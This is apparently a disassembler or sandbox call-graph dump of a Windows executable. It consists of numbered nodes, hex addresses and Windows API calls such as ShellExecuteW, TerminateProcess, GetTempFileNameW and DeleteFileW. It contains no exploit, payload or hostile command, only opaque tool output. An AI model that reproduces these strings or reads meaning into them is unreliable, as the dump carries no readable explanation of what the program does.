API calls 2 library calls 96519->96581 96582 806a0 41 API calls messages 96519->96582 96584 e359c 82 API calls __wsopen_s 96521->96584 96527 7a8c7 22 API calls 96522->96527 96522->96529 96525->96529 96526->96519 96527->96529 96529->96470 96530->96519 96531->96529 96533 c4bdc 96531->96533 96531->96535 96532->96519 96585 e359c 82 API calls __wsopen_s 96533->96585 96535->96529 96583 e359c 82 API calls __wsopen_s 96535->96583 96536->96497 96537->96440 96538->96461 96539->96474 96540->96438 96541->96503 96542->96437 96543->96437 96545 80502 96544->96545 96547 8050b 96545->96547 96593 8a732 22 API calls 96545->96593 96548 805c0 96547->96548 96549 8fddb 22 API calls 96547->96549 96548->96471 96550 80629 96549->96550 96551 8fddb 22 API calls 96550->96551 96552 80632 96551->96552 96587 79cb3 96552->96587 96555->96459 96556->96441 96557->96447 96558->96445 96559->96449 96561 7a8ea __fread_nolock 96560->96561 96562 7a8db 96560->96562 96561->96442 96562->96561 96563 8fe0b 22 API calls 96562->96563 96563->96561 96564->96486 96565->96488 96566->96487 96567->96497 96568->96499 96569->96503 96570->96462 96571->96485 96572->96479 96573->96448 96574->96465 96575->96448 96576->96485 96577->96425 96578->96510 96579->96510 96580->96510 96581->96519 96582->96519 96583->96529 96584->96529 96585->96515 96586->96529 96588 79cc2 _wcslen 96587->96588 96589 8fe0b 22 API calls 96588->96589 96590 79cea __fread_nolock 96589->96590 96591 8fddb 22 API calls 96590->96591 96592 79d00 96591->96592 96592->96471 96593->96547 96594 c2a00 96609 7d7b0 messages 96594->96609 96595 7db11 PeekMessageW 96595->96609 96596 7d807 GetInputState 96596->96595 96596->96609 96597 c1cbe TranslateAcceleratorW 96597->96609 96599 7db8f PeekMessageW 96599->96609 96600 7da04 timeGetTime 96600->96609 96601 7db73 TranslateMessage DispatchMessageW 96601->96599 96602 7dbaf Sleep 96617 7dbc0 96602->96617 96603 c2b74 Sleep 96603->96617 96604 8e551 timeGetTime 96604->96617 96605 c1dda timeGetTime 96775 8e300 23 API calls 96605->96775 96608 c2c0b GetExitCodeProcess 96612 c2c37 CloseHandle 96608->96612 96613 c2c21 WaitForSingleObject 96608->96613 96609->96595 96609->96596 96609->96597 96609->96599 96609->96600 96609->96601 96609->96602 96609->96603 96609->96605 96614 7d9d5 96609->96614 96621 7ec40 235 API calls 96609->96621 96626 7dd50 96609->96626 96633 7dfd0 96609->96633 96656 81310 96609->96656 96712 8edf6 96609->96712 96717 7bf40 96609->96717 96776 e3a2a 23 API calls 96609->96776 96777 e359c 82 API calls __wsopen_s 96609->96777 96610 1029bf GetForegroundWindow 96610->96617 96612->96617 96613->96609 96613->96612 96615 c2a31 96615->96614 96616 c2ca9 Sleep 96616->96609 96617->96604 96617->96608 96617->96609 96617->96610 96617->96614 96617->96615 96617->96616 96778 f5658 23 API calls 96617->96778 96779 de97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96617->96779 96780 dd4dc 47 API calls 96617->96780 96621->96609 96627 7dd83 96626->96627 96628 7dd6f 96626->96628 96782 e359c 82 API calls __wsopen_s 96627->96782 96781 7d260 235 API calls 2 library calls 96628->96781 96631 7dd7a 96631->96609 96632 c2f75 96632->96632 96635 7e010 96633->96635 96634 7ec40 235 API calls 96651 7e0dc messages 96634->96651 96635->96651 96785 90242 5 API calls __Init_thread_wait 96635->96785 96638 c2fca 96640 7a961 22 API calls 96638->96640 96638->96651 96639 7a961 22 API calls 96639->96651 96643 c2fe4 96640->96643 96786 900a3 29 API calls __onexit 96643->96786 96645 c2fee 96787 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96645->96787 96649 7a8c7 22 API calls 96649->96651 96650 804f0 22 API calls 96650->96651 96651->96634 96651->96639 96651->96649 96651->96650 96652 7e3e1 96651->96652 96653 e359c 82 API calls 96651->96653 96783 7a81b 41 API calls 96651->96783 96784 8a308 235 API calls 96651->96784 96788 90242 5 API calls __Init_thread_wait 96651->96788 96789 900a3 29 API calls __onexit 96651->96789 96790 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96651->96790 96791 f47d4 235 API calls 96651->96791 96792 f68c1 235 API calls 96651->96792 96652->96609 96653->96651 96657 817b0 96656->96657 96658 81376 96656->96658 96892 90242 5 API calls __Init_thread_wait 96657->96892 96660 81390 96658->96660 96661 c6331 96658->96661 96665 81940 9 API calls 96660->96665 96662 c633d 96661->96662 96897 f709c 235 API calls 96661->96897 96662->96609 96664 817ba 96666 817fb 96664->96666 96668 79cb3 22 API calls 96664->96668 96667 813a0 96665->96667 96671 c6346 96666->96671 96673 8182c 96666->96673 96669 81940 9 API calls 96667->96669 96677 817d4 96668->96677 96670 813b6 96669->96670 96670->96666 96672 813ec 96670->96672 96898 e359c 82 API calls __wsopen_s 96671->96898 96672->96671 96696 81408 __fread_nolock 96672->96696 96894 7aceb 23 API calls messages 96673->96894 96676 81839 96895 8d217 235 API calls 96676->96895 96893 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96677->96893 96680 c636e 96899 e359c 82 API calls __wsopen_s 96680->96899 96681 8152f 96683 8153c 96681->96683 96684 c63d1 96681->96684 96686 81940 9 API calls 96683->96686 96901 f5745 54 API calls _wcslen 96684->96901 96688 81549 96686->96688 96687 8fddb 22 API calls 96687->96696 96691 c64fa 96688->96691 96693 81940 9 API calls 96688->96693 96689 81872 96896 8faeb 23 API calls 96689->96896 96690 8fe0b 22 API calls 96690->96696 96700 c6369 96691->96700 96902 e359c 82 API calls __wsopen_s 96691->96902 96698 81563 96693->96698 96695 7ec40 235 API calls 96695->96696 96696->96676 96696->96680 96696->96681 96696->96687 96696->96690 96696->96695 96697 c63b2 96696->96697 96696->96700 96900 e359c 82 API calls __wsopen_s 96697->96900 96698->96691 96701 7a8c7 22 API calls 96698->96701 96704 815c7 messages 96698->96704 96700->96609 96701->96704 96702 81940 9 API calls 96702->96704 96703 8171d 96703->96609 96704->96689 96704->96691 96704->96700 96704->96702 96705 8167b messages 96704->96705 96793 ef0ec 96704->96793 96802 e6ef1 96704->96802 96882 f959f 96704->96882 96885 dd4ce 96704->96885 96888 f958b 96704->96888 96705->96703 96891 8ce17 22 API calls messages 96705->96891 96714 8ee12 96712->96714 96715 8ee09 96712->96715 96713 8ee36 IsDialogMessageW 96713->96714 96713->96715 96714->96713 96714->96715 96716 cefaf GetClassLongW 96714->96716 96715->96609 96716->96713 96716->96714 97311 7adf0 96717->97311 96719 7bf9d 96720 c04b6 96719->96720 96721 7bfa9 96719->96721 97330 e359c 82 API calls __wsopen_s 96720->97330 96723 c04c6 96721->96723 96724 7c01e 96721->96724 97331 e359c 82 API calls __wsopen_s 96723->97331 97316 7ac91 96724->97316 96728 7c7da 96731 8fe0b 22 API calls 96728->96731 96736 7c808 __fread_nolock 96731->96736 96733 c04f5 96738 c055a 96733->96738 97332 8d217 235 API calls 96733->97332 96739 8fe0b 22 API calls 96736->96739 96737 7af8a 22 API calls 96759 7c039 __fread_nolock messages 96737->96759 96774 7c603 96738->96774 97333 e359c 82 API calls __wsopen_s 96738->97333 96763 7c350 __fread_nolock messages 96739->96763 96740 d7120 22 API calls 96740->96759 96741 c091a 97343 e3209 23 API calls 96741->97343 96744 7ec40 235 API calls 96744->96759 96745 c08a5 96746 7ec40 235 API calls 96745->96746 96748 c08cf 96746->96748 96748->96774 97341 7a81b 41 API calls 96748->97341 96749 c0591 97334 e359c 82 API calls __wsopen_s 96749->97334 96750 c08f6 97342 e359c 82 API calls __wsopen_s 96750->97342 96755 7bbe0 40 API calls 96755->96759 96756 7c3ac 96756->96609 96757 7c237 96760 7c253 96757->96760 96761 7a8c7 22 API calls 96757->96761 96759->96728 96759->96733 96759->96736 96759->96737 96759->96738 96759->96740 96759->96741 96759->96744 96759->96745 96759->96749 96759->96750 96759->96755 96759->96757 96764 8fddb 22 API calls 96759->96764 96767 c09bf 96759->96767 96773 8fe0b 22 API calls 96759->96773 96759->96774 97320 7ad81 96759->97320 97335 d7099 22 API calls __fread_nolock 96759->97335 97336 f5745 54 API calls _wcslen 96759->97336 97337 8aa42 22 API calls messages 96759->97337 97338 df05c 40 API calls 96759->97338 97339 7a993 41 API calls 96759->97339 97340 7aceb 23 API calls messages 96759->97340 96762 c0976 96760->96762 96768 7c297 messages 96760->96768 96761->96760 97344 7aceb 23 API calls messages 96762->97344 96763->96756 97329 8ce17 22 API calls messages 96763->97329 96764->96759 96767->96774 97345 e359c 82 API calls __wsopen_s 96767->97345 96768->96767 97327 7aceb 23 API calls messages 96768->97327 96770 7c335 96770->96767 96771 7c342 96770->96771 97328 7a704 22 API calls messages 96771->97328 96773->96759 96774->96609 96775->96609 96776->96609 96777->96609 96778->96617 96779->96617 96780->96617 96781->96631 96782->96632 96783->96651 96784->96651 96785->96638 96786->96645 96787->96651 96788->96651 96789->96651 96790->96651 96791->96651 96792->96651 96903 77510 96793->96903 96797 ef136 96798 ef15b 96797->96798 96799 7ec40 235 API calls 96797->96799 96801 ef15f 96798->96801 96954 79c6e 22 API calls 96798->96954 96799->96798 96801->96704 96803 7a961 22 API calls 96802->96803 96804 e6f1d 96803->96804 96805 7a961 22 API calls 96804->96805 96806 e6f26 96805->96806 96807 e6f3a 96806->96807 97139 7b567 39 API calls 96806->97139 96809 77510 53 API calls 96807->96809 96810 e6f57 _wcslen 96809->96810 96811 e70bf 96810->96811 96812 e6fbc 96810->96812 96881 e70e9 96810->96881 96813 74ecb 94 API calls 96811->96813 96814 77510 53 API calls 96812->96814 96815 e70d0 96813->96815 96816 e6fc8 96814->96816 96817 e70e5 96815->96817 96818 74ecb 94 API calls 96815->96818 96820 7a8c7 22 API calls 96816->96820 96822 e6fdb 96816->96822 96819 7a961 22 API calls 96817->96819 96817->96881 96818->96817 96821 e711a 96819->96821 96820->96822 96824 7a961 22 API calls 96821->96824 96823 e7027 96822->96823 96825 e7005 96822->96825 96828 7a8c7 22 API calls 96822->96828 96826 77510 53 API calls 96823->96826 96827 e7126 96824->96827 97140 733c6 96825->97140 96830 e7034 96826->96830 96831 7a961 22 API calls 96827->96831 96828->96825 96834 e703d 96830->96834 96835 e7047 96830->96835 96832 e712f 96831->96832 96837 7a961 22 API calls 96832->96837 96833 e700f 96838 77510 53 API calls 96833->96838 96839 7a8c7 22 API calls 96834->96839 97149 de199 GetFileAttributesW 96835->97149 96841 e7138 96837->96841 96842 e701b 96838->96842 96839->96835 96840 e7050 96843 e7063 96840->96843 96846 74c6d 22 API calls 96840->96846 96844 77510 53 API calls 96841->96844 96845 76350 22 API calls 96842->96845 96848 77510 53 API calls 96843->96848 96854 e7069 96843->96854 96847 e7145 96844->96847 96845->96823 96846->96843 96976 7525f 96847->96976 96850 e70a0 96848->96850 97150 dd076 57 API calls 96850->97150 96851 e7166 97018 74c6d 96851->97018 96854->96881 96856 e71a9 96857 7a8c7 22 API calls 96856->96857 96859 e71ba 96857->96859 96858 74c6d 22 API calls 96860 e7186 96858->96860 97021 76350 96859->97021 96860->96856 96863 76b57 22 API calls 96860->96863 96865 e719b 96863->96865 96864 76350 22 API calls 96866 e71d6 96864->96866 96867 76b57 22 API calls 96865->96867 96868 76350 22 API calls 96866->96868 96867->96856 96869 e71e4 96868->96869 96870 77510 53 API calls 96869->96870 96871 e71f0 96870->96871 97030 dd7bc 96871->97030 96873 e7201 96874 dd4ce 4 API calls 96873->96874 96875 e720b 96874->96875 96876 77510 53 API calls 96875->96876 96880 e7239 96875->96880 96877 e7229 96876->96877 97084 e2947 96877->97084 96879 74f39 68 API calls 96879->96881 96880->96879 96881->96704 97195 f7f59 96882->97195 96884 f95af 96884->96704 97306 ddbbe lstrlenW 96885->97306 96889 f7f59 120 API calls 96888->96889 96890 f959b 96889->96890 96890->96704 96891->96705 96892->96664 96893->96666 96894->96676 96895->96689 96896->96689 96897->96662 96898->96700 96899->96700 96900->96700 96901->96698 96902->96700 96904 77525 96903->96904 96919 77522 96903->96919 96905 7752d 96904->96905 96906 7755b 96904->96906 96955 951c6 26 API calls 96905->96955 96908 b500f 96906->96908 96909 7756d 96906->96909 96916 b50f6 96906->96916 96920 8fe0b 22 API calls 96908->96920 96925 b5088 96908->96925 96956 8fb21 51 API calls 96909->96956 96910 7753d 96915 8fddb 22 API calls 96910->96915 96912 b510e 96912->96912 96917 77547 96915->96917 96958 95183 26 API calls 96916->96958 96918 79cb3 22 API calls 96917->96918 96918->96919 96926 79e90 96919->96926 96921 b5058 96920->96921 96922 8fddb 22 API calls 96921->96922 96923 b507f 96922->96923 96924 79cb3 22 API calls 96923->96924 96924->96925 96957 8fb21 51 API calls 96925->96957 96959 76270 96926->96959 96928 79fd2 96929 7a4a1 22 API calls 96928->96929 96930 79fec 96929->96930 96930->96797 96933 bf7c4 96974 d96e2 84 API calls __wsopen_s 96933->96974 96934 bf699 96942 8fddb 22 API calls 96934->96942 96935 7a405 96935->96930 96975 d96e2 84 API calls __wsopen_s 96935->96975 96937 7a4a1 22 API calls 96953 79eb5 96937->96953 96940 7a6c3 22 API calls 96940->96953 96941 bf7d2 96943 7a4a1 22 API calls 96941->96943 96944 bf754 96942->96944 96945 bf7e8 96943->96945 96946 8fe0b 22 API calls 96944->96946 96945->96930 96947 7a12c __fread_nolock 96946->96947 96947->96933 96947->96935 96950 7aec9 22 API calls 96951 7a0db CharUpperBuffW 96950->96951 96970 7a673 22 API calls 96951->96970 96953->96928 96953->96933 96953->96934 96953->96935 96953->96937 96953->96940 96953->96947 96953->96950 96964 74573 41 API calls _wcslen 96953->96964 96965 7a587 96953->96965 96971 748c8 23 API calls 96953->96971 96972 749bd 22 API calls __fread_nolock 96953->96972 96973 7a673 22 API calls 96953->96973 96954->96801 96955->96910 96956->96910 96957->96916 96958->96912 96960 8fe0b 22 API calls 96959->96960 96961 76295 96960->96961 96962 8fddb 22 API calls 96961->96962 96963 762a3 96962->96963 96963->96953 96964->96953 96966 7a59d 96965->96966 96969 7a598 __fread_nolock 96965->96969 96967 bf80f 96966->96967 96968 8fe0b 22 API calls 96966->96968 96968->96969 96969->96953 96970->96953 96971->96953 96972->96953 96973->96953 96974->96941 96975->96930 96977 7a961 22 API calls 96976->96977 96978 75275 96977->96978 96979 7a961 22 API calls 96978->96979 96980 7527d 96979->96980 96981 7a961 22 API calls 96980->96981 96982 75285 96981->96982 96983 7a961 22 API calls 96982->96983 96984 7528d 96983->96984 96985 752c1 96984->96985 96986 b3df5 96984->96986 96988 76d25 22 API calls 96985->96988 96987 7a8c7 22 API calls 96986->96987 96989 b3dfe 96987->96989 96990 752cf 96988->96990 96991 7a6c3 22 API calls 96989->96991 96992 793b2 22 API calls 96990->96992 96994 75304 96991->96994 96993 752d9 96992->96993 96993->96994 96995 76d25 22 API calls 96993->96995 96996 75349 96994->96996 96997 75325 96994->96997 96998 b3e20 96994->96998 97000 752fa 96995->97000 97151 76d25 96996->97151 96997->96996 97003 74c6d 22 API calls 96997->97003 97006 76b57 22 API calls 96998->97006 97002 793b2 22 API calls 97000->97002 97001 7535a 97004 75370 97001->97004 97008 7a8c7 22 API calls 97001->97008 97002->96994 97005 75332 97003->97005 97007 75384 97004->97007 97009 7a8c7 22 API calls 97004->97009 97005->96996 97010 76d25 22 API calls 97005->97010 97015 b3ee0 97006->97015 97011 7a8c7 22 API calls 97007->97011 97012 7538f 97007->97012 97008->97004 97009->97007 97010->96996 97011->97012 97013 7a8c7 22 API calls 97012->97013 97017 7539a 97012->97017 97013->97017 97014 74c6d 22 API calls 97014->97015 97015->96996 97015->97014 97164 749bd 22 API calls __fread_nolock 97015->97164 97017->96851 97019 7aec9 22 API calls 97018->97019 97020 74c78 97019->97020 97020->96856 97020->96858 97022 76362 97021->97022 97023 b4a51 97021->97023 97166 76373 97022->97166 97176 74a88 22 API calls __fread_nolock 97023->97176 97026 7636e 97026->96864 97027 b4a5b 97028 b4a67 97027->97028 97029 7a8c7 22 API calls 97027->97029 97029->97028 97031 dd7d8 97030->97031 97032 dd7dd 97031->97032 97033 dd7f3 97031->97033 97034 dd7ee 97032->97034 97036 7a8c7 22 API calls 97032->97036 97035 7a961 22 API calls 97033->97035 97034->96873 97037 dd7fb 97035->97037 97036->97034 97038 7a961 22 API calls 97037->97038 97039 dd803 97038->97039 97040 7a961 22 API calls 97039->97040 97041 dd80e 97040->97041 97042 7a961 22 API calls 97041->97042 97043 dd816 97042->97043 97044 7a961 22 API calls 97043->97044 97045 dd81e 97044->97045 97046 7a961 22 API calls 97045->97046 97047 dd826 97046->97047 97048 7a961 22 API calls 97047->97048 97049 dd82e 97048->97049 97050 7a961 22 API calls 97049->97050 97051 dd836 97050->97051 97052 7525f 22 API calls 97051->97052 97053 dd84d 97052->97053 97054 7525f 22 API calls 97053->97054 97055 dd866 97054->97055 97056 74c6d 22 API calls 97055->97056 97057 dd872 97056->97057 97058 dd885 97057->97058 97059 793b2 22 API calls 97057->97059 97060 74c6d 22 API calls 97058->97060 97059->97058 97061 dd88e 97060->97061 97062 dd89e 97061->97062 97063 793b2 22 API calls 97061->97063 97064 dd8b0 97062->97064 97065 7a8c7 22 API calls 97062->97065 97063->97062 97066 76350 22 API calls 97064->97066 97065->97064 97067 dd8bb 97066->97067 97177 dd978 22 API calls 97067->97177 97069 dd8ca 97178 dd978 22 API calls 97069->97178 97071 dd8dd 97072 74c6d 22 API calls 97071->97072 97073 dd8e7 97072->97073 97074 dd8ec 97073->97074 97075 dd8fe 97073->97075 97076 733c6 22 API calls 97074->97076 97077 74c6d 22 API calls 97075->97077 97078 dd8f9 97076->97078 97079 dd907 97077->97079 97081 76350 22 API calls 97078->97081 97080 dd925 97079->97080 97083 733c6 22 API calls 97079->97083 97082 76350 22 API calls 97080->97082 97081->97080 97082->97034 97083->97078 97085 e2954 __wsopen_s 97084->97085 97086 8fe0b 22 API calls 97085->97086 97087 e2971 97086->97087 97088 75722 22 API calls 97087->97088 97089 e297b 97088->97089 97090 e274e 27 API calls 97089->97090 97091 e2986 97090->97091 97092 7511f 64 API calls 97091->97092 97093 e299b 97092->97093 97094 e29bf 97093->97094 97095 e2a6c 97093->97095 97096 e2e66 75 API calls 97094->97096 97097 e2e66 75 API calls 97095->97097 97098 e29c4 97096->97098 97099 e2a38 97097->97099 97133 e2a75 messages 97098->97133 97183 9d583 26 API calls 97098->97183 97102 750f5 40 API calls 97099->97102 97099->97133 97101 e29ed 97184 9d583 26 API calls 97101->97184 97103 e2a91 97102->97103 97104 750f5 40 API calls 97103->97104 97105 e2aa1 97104->97105 97106 750f5 40 API calls 97105->97106 97108 e2abc 97106->97108 97109 750f5 40 API calls 97108->97109 97110 e2acc 97109->97110 97111 750f5 40 API calls 97110->97111 97112 e2ae7 97111->97112 97113 750f5 40 API calls 97112->97113 97114 e2af7 97113->97114 97115 750f5 40 API calls 97114->97115 97116 e2b07 97115->97116 97117 750f5 40 API calls 97116->97117 97118 e2b17 97117->97118 97179 e3017 GetTempPathW GetTempFileNameW 97118->97179 97120 e2b22 97121 9e5eb 29 API calls 97120->97121 97131 e2b33 97121->97131 97122 e2bed 97123 9e678 67 API calls 97122->97123 97124 e2bf8 97123->97124 97126 e2bfe DeleteFileW 97124->97126 97127 e2c12 97124->97127 97125 750f5 40 API calls 97125->97131 97126->97133 97131->97122 97131->97125 97131->97133 97134 9dbb3 65 API calls 97131->97134 97133->96880 97134->97131 97139->96807 97141 b30bb 97140->97141 97142 733dd 97140->97142 97143 8fddb 22 API calls 97141->97143 97185 733ee 97142->97185 97146 b30c5 _wcslen 97143->97146 97145 733e8 97145->96833 97147 8fe0b 22 API calls 97146->97147 97148 b30fe __fread_nolock 97147->97148 97149->96840 97150->96854 97152 76d34 97151->97152 97153 76d91 97151->97153 97152->97153 97155 76d3f 97152->97155 97154 793b2 22 API calls 97153->97154 97161 76d62 __fread_nolock 97154->97161 97156 b4c9d 97155->97156 97157 76d5a 97155->97157 97158 8fddb 22 API calls 97156->97158 97165 76f34 22 API calls 97157->97165 97160 b4ca7 97158->97160 97162 8fe0b 22 API calls 97160->97162 97161->97001 97163 b4cda 97162->97163 97164->97015 97165->97161 97167 763b6 __fread_nolock 97166->97167 97168 76382 97166->97168 97167->97026 97168->97167 97169 b4a82 97168->97169 97170 763a9 97168->97170 97172 8fddb 22 API calls 97169->97172 97171 7a587 22 API calls 97170->97171 97171->97167 97173 b4a91 97172->97173 97174 8fe0b 22 API calls 97173->97174 97175 b4ac5 __fread_nolock 97174->97175 97176->97027 97177->97069 97178->97071 97179->97120 97183->97101 97184->97099 97186 733fe _wcslen 97185->97186 97187 b311d 97186->97187 97188 73411 97186->97188 97190 8fddb 22 API calls 97187->97190 97189 7a587 22 API calls 97188->97189 97191 7341e __fread_nolock 97189->97191 97192 b3127 97190->97192 97191->97145 97193 8fe0b 22 API calls 97192->97193 97194 b3157 __fread_nolock 97193->97194 97196 77510 53 API calls 97195->97196 97197 f7f90 97196->97197 97221 f7fd5 messages 97197->97221 97233 f8cd3 97197->97233 97199 f8281 97200 f844f 97199->97200 97205 f828f 97199->97205 97281 f8ee4 60 API calls 97200->97281 97203 f845e 97204 f846a 97203->97204 97203->97205 97204->97221 97246 f7e86 97205->97246 97206 77510 53 API calls 97223 f8049 97206->97223 97211 f82c8 97261 8fc70 97211->97261 97214 f82e8 97278 e359c 82 API calls __wsopen_s 97214->97278 97215 f8302 97265 763eb 97215->97265 97218 f82f3 GetCurrentProcess TerminateProcess 97218->97215 97221->96884 97223->97199 97223->97206 97223->97221 97276 d417d 22 API calls __fread_nolock 97223->97276 97277 f851d 42 API calls _strftime 97223->97277 97224 f84c5 97224->97221 97228 f84d9 FreeLibrary 97224->97228 97225 804f0 22 API calls 97226 f8341 97225->97226 97279 f8b7b 75 API calls 97226->97279 97227 804f0 22 API calls 97232 f8352 97227->97232 97228->97221 97232->97224 97232->97227 97280 7aceb 23 API calls messages 97232->97280 97282 f8b7b 75 API calls 97232->97282 97234 7aec9 22 API calls 97233->97234 97235 f8cee CharLowerBuffW 97234->97235 97283 d8e54 97235->97283 97239 7a961 22 API calls 97240 f8d2a 97239->97240 97241 76d25 22 API calls 97240->97241 97242 f8d3e 97241->97242 97243 793b2 22 API calls 97242->97243 97245 f8d48 _wcslen 97243->97245 97244 f8e5e _wcslen 97244->97223 97245->97244 97290 f851d 42 API calls _strftime 97245->97290 97247 f7ea1 97246->97247 97248 f7eec 97246->97248 97249 8fe0b 22 API calls 97247->97249 97252 f9096 97248->97252 97250 f7ec3 97249->97250 97250->97248 97251 8fddb 22 API calls 97250->97251 97251->97250 97253 f92ab messages 97252->97253 97260 f90ba _strcat _wcslen 97252->97260 97253->97211 97254 7b6b5 39 API calls 97254->97260 97255 7b567 39 API calls 97255->97260 97256 7b38f 39 API calls 97256->97260 97257 9ea0c 21 API calls ___std_exception_copy 97257->97260 97258 77510 53 API calls 97258->97260 97260->97253 97260->97254 97260->97255 97260->97256 97260->97257 97260->97258 97293 defae 24 API calls _wcslen 97260->97293 97262 8fc85 97261->97262 97263 8fd1d ReadFile 97262->97263 97264 8fceb 97262->97264 97263->97264 97264->97214 97264->97215 97266 763f3 97265->97266 97267 8fddb 22 API calls 97266->97267 97268 76401 97267->97268 97294 76a26 97268->97294 97271 76a50 97297 7b010 97271->97297 97273 76a60 97274 8fe0b 22 API calls 97273->97274 97275 76afc 97273->97275 97274->97275 97275->97225 97275->97232 97276->97223 97277->97223 97278->97218 97279->97232 97280->97232 97281->97203 97282->97232 97285 d8e74 _wcslen 97283->97285 97284 d8f63 97284->97239 97284->97245 97285->97284 97287 d8ea9 97285->97287 97289 d8f68 97285->97289 97287->97284 97291 8ce60 41 API calls 97287->97291 97289->97284 97292 8ce60 41 API calls 97289->97292 97290->97244 97291->97287 97292->97289 97293->97260 97295 8fddb 22 API calls 97294->97295 97296 76409 97295->97296 97296->97271 97298 7b01b 97297->97298 97299 bfb4d 97298->97299 97302 7b023 messages 97298->97302 97300 8fddb 22 API calls 97299->97300 97304 bfb59 97300->97304 97301 7b02a 97301->97273 97302->97301 97305 7b090 22 API calls messages 97302->97305 97304->97304 97305->97302 97307 ddbdc GetFileAttributesW 97306->97307 97308 dd4d5 97306->97308 97307->97308 97309 ddbe8 FindFirstFileW 97307->97309 97308->96704 97309->97308 97310 ddbf9 FindClose 97309->97310 97310->97308 97312 7ae01 97311->97312 97315 7ae1c messages 97311->97315 97313 7aec9 22 API calls 97312->97313 97314 7ae09 CharUpperBuffW 97313->97314 97314->97315 97315->96719 97317 7acae 97316->97317 97319 7acd1 97317->97319 97346 e359c 82 API calls __wsopen_s 97317->97346 97319->96759 97321 bfadb 97320->97321 97322 7ad92 97320->97322 97323 8fddb 22 API calls 97322->97323 97324 7ad99 97323->97324 97347 7adcd 97324->97347 97327->96770 97328->96763 97329->96763 97330->96723 97331->96774 97332->96738 97333->96774 97334->96774 97335->96759 97336->96759 97337->96759 97338->96759 97339->96759 97340->96759 97341->96750 97342->96774 97343->96757 97344->96767 97345->96774 97346->97319 97351 7addd 97347->97351 97348 7adb6 97348->96759 97349 8fddb 22 API calls 97349->97351 97350 7a961 22 API calls 97350->97351 97351->97348 97351->97349 97351->97350 97352 7a8c7 22 API calls 97351->97352 97353 7adcd 22 API calls 97351->97353 97352->97351 97353->97351 97354 b2ba5 97355 72b25 97354->97355 97356 b2baf 97354->97356 97382 72b83 7 API calls 97355->97382 97397 73a5a 97356->97397 97359 b2bb8 97361 79cb3 22 API calls 97359->97361 97364 b2bc6 97361->97364 97363 72b2f 97365 72b44 97363->97365 97386 73837 97363->97386 97366 b2bce 97364->97366 97367 b2bf5 97364->97367 97373 72b5f 97365->97373 97396 730f2 Shell_NotifyIconW ___scrt_fastfail 97365->97396 97369 733c6 22 API calls 97366->97369 97370 733c6 22 API calls 97367->97370 97371 b2bd9 97369->97371 97372 b2bf1 GetForegroundWindow ShellExecuteW 97370->97372 97374 76350 22 API calls 97371->97374 97378 b2c26 97372->97378 97379 72b66 SetCurrentDirectoryW 97373->97379 97377 b2be7 97374->97377 97380 733c6 22 API calls 97377->97380 97378->97373 97381 72b7a 97379->97381 97380->97372 97404 72cd4 7 API calls 97382->97404 97384 72b2a 97385 72c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97384->97385 97385->97363 97387 73862 ___scrt_fastfail 97386->97387 97405 74212 97387->97405 97390 738e8 97392 73906 Shell_NotifyIconW 97390->97392 97393 b3386 Shell_NotifyIconW 97390->97393 97409 73923 97392->97409 97395 7391c 97395->97365 97396->97373 97398 b1f50 __wsopen_s 97397->97398 97399 73a67 GetModuleFileNameW 97398->97399 97400 79cb3 22 API calls 97399->97400 97401 73a8d 97400->97401 97402 73aa2 23 API calls 97401->97402 97403 73a97 97402->97403 97403->97359 97404->97384 97406 738b7 97405->97406 97407 b35a4 97405->97407 97406->97390 97431 dc874 42 API calls _strftime 97406->97431 97407->97406 97408 b35ad DestroyIcon 97407->97408 97408->97406 97410 7393f 97409->97410 97428 73a13 97409->97428 97411 76270 22 API calls 97410->97411 97412 7394d 97411->97412 97413 b3393 LoadStringW 97412->97413 97414 7395a 97412->97414 97416 b33ad 97413->97416 97415 76b57 22 API calls 97414->97415 97417 7396f 97415->97417 97420 7a8c7 22 API calls 97416->97420 97430 73994 ___scrt_fastfail 97416->97430 97418 b33c9 97417->97418 97419 7397c 97417->97419 97422 76350 22 API calls 97418->97422 97419->97416 97421 73986 97419->97421 97420->97430 97423 76350 22 API calls 97421->97423 97424 b33d7 97422->97424 97423->97430 97426 733c6 22 API calls 97424->97426 97424->97430 97425 739f9 Shell_NotifyIconW 97425->97428 97427 b33f9 97426->97427 97429 733c6 22 API calls 97427->97429 97428->97395 97429->97430 97430->97425 97431->97390 97432 72e37 97433 7a961 22 API calls 97432->97433 97434 72e4d 97433->97434 97511 74ae3 97434->97511 97436 72e6b 97437 73a5a 24 API calls 97436->97437 97438 72e7f 97437->97438 97439 79cb3 22 API calls 97438->97439 97440 72e8c 97439->97440 97441 74ecb 94 API calls 97440->97441 97442 72ea5 97441->97442 97443 72ead 97442->97443 97444 b2cb0 97442->97444 97447 7a8c7 22 API calls 97443->97447 97445 e2cf9 80 API calls 97444->97445 97446 b2cc3 97445->97446 97448 b2ccf 97446->97448 97450 74f39 68 API calls 97446->97450 97449 72ec3 97447->97449 97452 74f39 68 API calls 97448->97452 97525 76f88 22 API calls 97449->97525 97450->97448 97454 b2ce5 97452->97454 97453 72ecf 97455 79cb3 22 API calls 97453->97455 97539 73084 22 API calls 97454->97539 97456 72edc 97455->97456 97526 7a81b 41 API calls 97456->97526 97459 72eec 97461 79cb3 22 API calls 97459->97461 97460 b2d02 97540 73084 22 API calls 97460->97540 97462 72f12 97461->97462 97527 7a81b 41 API calls 97462->97527 97465 b2d1e 97466 73a5a 24 API calls 97465->97466 97467 b2d44 97466->97467 97541 73084 22 API calls 97467->97541 97468 72f21 97471 7a961 22 API calls 97468->97471 97470 b2d50 97472 7a8c7 22 API calls 97470->97472 97473 72f3f 97471->97473 97474 b2d5e 97472->97474 97528 73084 22 API calls 97473->97528 97542 73084 22 API calls 97474->97542 97477 72f4b 97529 94a28 40 API calls 3 library calls 97477->97529 97478 b2d6d 97482 7a8c7 22 API calls 97478->97482 97480 72f59 97480->97454 97481 72f63 97480->97481 97530 94a28 40 API calls 3 library calls 97481->97530 97484 b2d83 97482->97484 97543 73084 22 API calls 97484->97543 97485 72f6e 97485->97460 97486 72f78 97485->97486 97531 94a28 40 API calls 3 library calls 97486->97531 97489 b2d90 97490 72f83 97490->97465 97491 72f8d 97490->97491 97532 94a28 40 API calls 3 library calls 97491->97532 97493 72f98 97494 72fdc 97493->97494 97533 73084 22 API calls 97493->97533 97494->97478 97495 72fe8 97494->97495 97495->97489 97497 763eb 22 API calls 97495->97497 97499 72ff8 